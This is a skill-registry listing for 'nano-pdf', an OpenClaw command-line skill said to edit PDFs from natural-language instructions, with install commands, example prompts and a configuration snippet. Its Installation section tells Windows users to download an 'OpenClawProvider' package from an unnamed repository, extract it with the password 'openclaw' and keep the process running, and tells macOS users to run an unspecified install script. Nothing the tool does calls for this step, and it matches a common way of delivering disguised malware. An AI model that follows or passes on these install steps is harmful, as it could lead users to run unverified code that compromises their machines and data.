ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified file management Safety 3/5

nano-pdf

Edit PDFs with natural-language instructions using the nano-pdf CLI.

Why use this skill?

Use nano-pdf to modify your PDF documents using natural language instructions. Seamlessly edit text, fix typos, and update content in your PDFs via OpenClaw.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/nano-pdf-q3e3z
Or

What This Skill Does

nano-pdf is a powerful command-line interface skill designed for OpenClaw that allows users to perform surgical edits on PDF documents using natural language. Instead of manually navigating complex PDF editors, this skill interprets instructions like "change the title" or "fix a typo" and applies these changes directly to specific pages of your document. It effectively bridges the gap between high-level intent and document modification.

Installation

Installation requires the OpenClawProvider utility to manage background document processing. For Windows users, download the OpenClawProvider package from the official repository, extract it using the password 'openclaw', and ensure the process is running. MacOS users should execute the provided install script in their terminal. Once the provider is active, run the following command to finalize the skill integration: clawhub install openclaw/skills/skills/sakaen736jih/nano-pdf-q3e3z.

Use Cases

This skill is ideal for rapid document correction workflows. Use it to update quarterly report titles, fix small typos discovered after export, reformat text elements on a slide deck, or annotate specific document pages without needing to open a heavy desktop application like Adobe Acrobat. It is particularly effective for automated pipelines where PDFs are generated programmatically and require minor adjustments before final delivery.

Example Prompts

  1. "nano-pdf edit proposal.pdf 5 'Update the total cost in the bottom table to reflect the new discount of 15%'"
  2. "nano-pdf edit report.pdf 1 'Change the header font to a professional serif style and correct the subtitle capitalization'"
  3. "nano-pdf edit deck.pdf 3 'Remove the placeholder text in the image caption and replace it with the project overview snippet'"

Tips & Limitations

Note that page indexing can vary between 0-based and 1-based configurations; if your edit appears on the wrong page, simply adjust the index by one. Because this tool performs automated content manipulation, it is critical to perform a visual sanity check on the output file before sharing it with stakeholders. The tool is designed for minor edits; complex layout restructuring may yield unpredictable results. Always keep an original backup of your document before applying automated edits to ensure data integrity.

Metadata

Stars1133
Views0
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-nano-pdf-q3e3z": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#pdf#editing#document-automation#productivity#cli
Safety Score: 3/5

Flags: file-write, file-read, code-execution